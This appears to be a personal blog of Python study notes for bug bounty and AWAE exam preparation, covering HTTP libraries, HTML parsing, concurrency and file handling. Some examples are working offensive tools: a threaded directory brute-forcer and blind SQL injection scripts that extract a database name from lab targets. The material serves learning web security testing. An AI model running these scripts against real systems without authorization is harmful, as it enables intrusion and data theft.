Python for Bug Bounty Hunters & Web Hackers
Sharing my personal notes and the resources I referred to while preparing for AWAE and learning Python.
Check out my original GitHub repository here: Python for AWAE
Objective
Learn and understand Python well enough that we can use it to automate our bug bounty tasks or create quick exploits whenever required.
Where did I learn Python?
- Python Tutorial for Beginners
- World's Best Python Tutorials (I think)
- Python OS Module
- Python Read and Write to files
- Python Requests Module
- Python re Module
- Python BeautifulSoup Module
- Python JSON Module
- Python Itertools Module
- Send Emails using python
- Python Requests-HTML Module
- Python Subprocess Module
- Python Threading Module
- Python Multiprocessing Module
- Python Zip Files Tutorial
Necessary Python Libraries
urllib2 (if Python 2.x is in use)
Code to make a Simple GET Request using urllib2:
import urllib2
url = 'https://www.google.com/'
response = urllib2.urlopen(url) # GET
print(response.read())
response.close()
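For completeness, here's what a POST would look like with urllib2 on Python 2. This is only a minimal sketch; the endpoint and credentials are placeholders, mirroring the urllib example in the next section.
import urllib
import urllib2

url = 'https://www.example.com/login'  # placeholder endpoint
info = {'user': 'blackhat', 'passwd': '1337'}
data = urllib.urlencode(info)  # urlencoded string
response = urllib2.urlopen(url, data)  # passing data switches the request to POST
print(response.read())
response.close()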
urllib (if Python 3.x is in use)
Code to make a Simple GET Request using urllib:
import urllib.parse
import urllib.request
url = 'https://www.google.com/'
with urllib.request.urlopen(url) as response: # GET
    content = response.read()
print(content)
Code to make a Simple POST Request using urllib:
info = {'user':'blackhat', 'passwd':'1337'}
data = urllib.parse.urlencode(info).encode() # data is now of type bytes
req = urllib.request.Request(url, data)
with urllib.request.urlopen(req) as response: # POST
    content = response.read()
print(content)
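urllib.request.Request can also carry custom headers, which is handy when a target filters on User-Agent. A minimal sketch, where the header value is just an example:
import urllib.request

url = 'https://www.google.com/'
headers = {'User-Agent': 'Mozilla/5.0'}  # example value, set whatever the target expects
req = urllib.request.Request(url, headers=headers)
with urllib.request.urlopen(req) as response:
    print(response.status)        # HTTP status code
    print(response.read()[:100])  # first 100 bytes of the body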
Requests
- It's not part of the standard library, so installation is required.
- Installation:
pip install requests
- Importing:
import requests
- Methods:
r = requests.get(url)
r = requests.post(url, data={'key': 'value'})
r = requests.put(url, data={'key': 'value'})
r = requests.delete(url)
r = requests.head(url)
r = requests.options(url)
- Print the request URL:
print(r.url)
- Passing params in URLs via GET:
payload = {'key1': 'value1', 'key2': 'value2'}
r = requests.get('https://httpbin.org/get', params=payload)
- Passing a list of items:
payload = {'key1': 'value1', 'key2': ['value2', 'value3']}
r = requests.get('https://httpbin.org/get', params=payload)
print(r.url)
- Get the response content in binary form:
r.content
- Get the response content in JSON form:
r.json()
- Get the raw response content (set stream=True on the request first):
r = requests.get(url, stream=True)
r.raw.read(10)
- Add custom headers:
url = 'https://api.github.com/some/endpoint'
headers = {'user-agent': 'my-app/0.0.1'}
r = requests.get(url, headers=headers)
- POST a multipart-encoded file:
url = 'https://httpbin.org/post'
files = {'file': open('report.xls', 'rb')}
r = requests.post(url, files=files)
r.text
- Sending our own cookies:
cookies = dict(cookies_are='working')
r = requests.get(url, cookies=cookies)
r.text
- Others:
r.status_code  # get status code
r.headers      # get response headers
r.cookies      # get cookies
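Putting a few of these together: a small sketch that routes traffic through a local intercepting proxy (assuming Burp on 127.0.0.1:8080, adjust to your own setup) and uses a Session so headers persist across requests:
import requests

proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}  # assumed Burp listener
s = requests.Session()
s.headers.update({'User-Agent': 'my-app/0.0.1'})  # sent with every request made via this session

# verify=False so Burp's self-signed CA doesn't break TLS; timeout keeps hung hosts from blocking us
r = s.get('https://httpbin.org/get', proxies=proxies, verify=False, timeout=10)
print(r.status_code)
print(r.json())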
lxml and BeautifulSoup packages
- The lxml package provides a slightly faster parser, while the BeautifulSoup package has logic to automatically detect the target HTML page's encoding.
- Installation:
pip install lxml
pip install beautifulsoup4
- Suppose we have the HTML content from a request stored in a variable named content. Using lxml, we can retrieve the content and parse out the links as follows:
from io import BytesIO
from lxml import etree
import requests

url = 'https://www.example.com'
r = requests.get(url)
content = r.content  # content is of type 'bytes'

parser = etree.HTMLParser()
content = etree.parse(BytesIO(content), parser=parser)  # parse into tree
for link in content.findall('//a'):  # find all "a" anchor elements
    print(f"{link.get('href')} -> {link.text}")
Note: I tested this and I think it only works with Python 3.6 or below.
- Same thing using BeautifulSoup:
from bs4 import BeautifulSoup as bs
import requests

url = "https://www.google.com"
r = requests.get(url)

tree = bs(r.text, 'html.parser')  # parse into tree
for link in tree.find_all('a'):  # find all "a" anchor elements
    print(f"{link.get('href')} -> {link.text}")
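A common bug-bounty variation on the same idea: pulling a hidden CSRF token out of a form before submitting a request. This is only a sketch; the URL and the csrf_token field name are assumptions and will differ per application.
from bs4 import BeautifulSoup as bs
import requests

r = requests.get("http://localhost/login.php")  # placeholder target
tree = bs(r.text, 'html.parser')
token_field = tree.find('input', {'name': 'csrf_token'})  # assumed field name
if token_field:
    print(token_field.get('value'))  # token value to replay in the follow-up request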
Python Multi-threading
I personally think multi-processing works better than multi-threaded Python scripts, but threading is still worth learning unless you want to just sit and watch each request go out one by one, wasting your time.
We usually use Python's `queue` module for multi-threading because it's thread-safe and avoids race conditions.
- Here's a directory brute-forcing tool that'll help you understand multi-threading using `queue`:
import queue
import threading
import urllib.error
import urllib.parse
import urllib.request

threads = 50
target_url = "http://testphp.vulnweb.com"
wordlist_file = "all.txt"  # from SVNDigger
resume = None
user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:19.0) " \
             "Gecko/20100101 " \
             "Firefox/19.0"


def build_wordlist(wordlst_file):
    # read in the word list
    fd = open(wordlst_file, "r")
    raw_words = [line.rstrip('\n') for line in fd]
    fd.close()

    found_resume = False
    words = queue.Queue()
    for word in raw_words:
        if resume:
            if found_resume:
                words.put(word)
            else:
                if word == resume:
                    found_resume = True
                    print("Resuming wordlist from: %s" % resume)
        else:
            words.put(word)
    return words


def dir_bruter(extensions=None):
    while not word_queue.empty():
        attempt = word_queue.get()
        attempt_list = []

        # check if there is a file extension; if not,
        # it's a directory path we're bruting
        if "." not in attempt:
            attempt_list.append("/%s/" % attempt)
        else:
            attempt_list.append("/%s" % attempt)

        # if we want to bruteforce extensions
        if extensions:
            for extension in extensions:
                attempt_list.append("/%s%s" % (attempt, extension))

        # iterate over our list of attempts
        for brute in attempt_list:
            url = "%s%s" % (target_url, urllib.parse.quote(brute))
            try:
                headers = {"User-Agent": user_agent}
                r = urllib.request.Request(url, headers=headers)
                response = urllib.request.urlopen(r)
                if len(response.read()):
                    print("[%d] => %s" % (response.code, url))
            except urllib.error.HTTPError as e:
                if e.code != 404:
                    print("!!! %d => %s" % (e.code, url))
                pass


word_queue = build_wordlist(wordlist_file)
file_extensions = [".php", ".bak", ".orig", ".inc"]

for i in range(threads):
    t = threading.Thread(target=dir_bruter, args=(file_extensions,))
    t.start()
Python Multi-Processing
Let's understand multi-processing using a script that retrieves the length of the database name via blind SQL injection:
import multiprocessing as mp
import requests

target = "http://localhost/link/"


def db_length(number):
    payload = f"te')/**/or/**/(length(database()))={number}#"
    param = {'q': payload}
    r = requests.get(target, params=param)
    content_length = int(r.headers['Content-length'])
    if content_length > 20:
        print(number)


if __name__ == "__main__":
    print('[*] Retrieving Database Length: \n[*] Database length: ', end=' ')
    processes = []
    for number in range(30):
        p = mp.Process(target=db_length, args=[number])
        p.start()
        processes.append(p)

    for process in processes:
        process.join()
Python concurrent.futures
This one is the GOAT. Less code, more capability.
import requests
import concurrent.futures

target = "http://localhost/atutor/"
final_string = {}


def db_length(number):
    payload = f"te')/**/or/**/(length(database()))={number}#"
    param = {'q': payload}
    r = requests.get(target, params=param)
    content_length = int(r.headers['Content-length'])
    if content_length > 20:
        return number


def atutor_dbRetrieval(l):
    for j in range(32, 256):
        payload = "te')/**/or/**/(select/**/"
        payload += f"ascii(substring(database(),{l},1))={j})#"  # f-string so l and j get substituted
        param = {'q': payload}
        r = requests.get(target, params=param)
        content_length = int(r.headers['Content-length'])
        if content_length > 20:
            final_string[l-1] = chr(j)
            print(''.join(final_string[i] for i in sorted(final_string.keys())))


if __name__ == "__main__":
    print('[*] Retrieving Database Length: \n[*] Database length: ', end=' ')
    db_len = 0
    with concurrent.futures.ProcessPoolExecutor() as executor:
        results = [executor.submit(db_length, _) for _ in range(30)]
        for f in concurrent.futures.as_completed(results):
            if f.result() is not None:
                db_len = f.result()
                print(db_len)

    print("[+] Retrieving Database name: ....")
    with concurrent.futures.ThreadPoolExecutor() as executor:
        # substring() positions are 1-indexed
        results = [executor.submit(atutor_dbRetrieval, index) for index in range(1, db_len + 1)]

    print("[+] Database Name: ", end=" ")
    print(''.join(final_string[i] for i in sorted(final_string.keys())))
    print("[+] Done")
Using Python to navigate the file system
OS Module
Note: the Python OS module can be used to navigate through the file system.
+ os.getcwd() => get current working directory
+ os.chdir(path) => change directory
+ os.listdir() => list directory contents
+ os.mkdir(dir_name) => create a directory
+ os.makedirs(dir_path) => make directories recursively
+ os.rmdir(dir_name) => remove a directory
+ os.removedirs(dir_path) => remove directories recursively
+ os.rename(src, dst) => rename a file
+ os.stat(filename) => print all info of a file
+ os.walk(path) => traverse a directory tree recursively
+ os.environ => get environment variables
+ os.path.join(path, file) => join paths without worrying about '/'
+ os.path.basename(path) => get the basename
+ os.path.dirname(path) => get the dirname
+ os.path.exists(path) => check if the path exists or not
+ os.path.splitext(path) => split the path and file extension
+ dir(os) => check what methods exist
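A quick sketch tying a few of these together: walking a directory tree from the current directory and printing every file with a given extension (the .txt filter is just an example):
import os

for root, dirs, files in os.walk(os.getcwd()):  # traverse from the current directory
    for name in files:
        if os.path.splitext(name)[1] == '.txt':  # filter on the (example) extension
            print(os.path.join(root, name))      # full path without worrying about '/'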
Using Python to read and write files
- Reading a file:
with open('test.txt', 'r') as f:
    f_contents = f.read()
    print(f_contents)
- Get all lines into a list:
with open('test.txt', 'r') as f:
    f_contents = f.readlines()
    print(f_contents)
- Read one line at a time:
with open('test.txt', 'r') as f:
    f_contents = f.readline()
    print(f_contents)
- Reading a file efficiently (line by line):
with open('test.txt', 'r') as f:
    for line in f:
        print(line, end='')
- Going back to the start of the file:
with open('test.txt', 'r') as f:
    print(f.read(10))  # read the first 10 characters
    f.seek(0)          # rewind to the start of the file
    print(f.read(10))  # reads the same 10 characters again
- Writing to a file:
with open('test2.txt', 'w') as f:
    f.write('Test')
Note: `w` will overwrite the file, so use `a` if you want to append.
- Appending to a file:
with open('test2.txt', 'a') as f:
    f.write('Test')
- Read from one file and write to another at the same time:
with open('test.txt', 'r') as rf:
    with open('test_copy.txt', 'w') as wf:
        for line in rf:
            wf.write(line)
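A related sketch for binary files (e.g. copying an image): open in 'rb'/'wb' modes and copy in chunks instead of line by line. The filenames are placeholders.
with open('photo.jpg', 'rb') as rf:            # placeholder source file
    with open('photo_copy.jpg', 'wb') as wf:
        chunk_size = 4096
        chunk = rf.read(chunk_size)
        while len(chunk) > 0:                  # keep copying until read() returns empty bytes
            wf.write(chunk)
            chunk = rf.read(chunk_size)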
Conclusion
In my experience, with this much Python knowledge you can write almost every automation script you'll ever need while doing bug bounties and web hacking.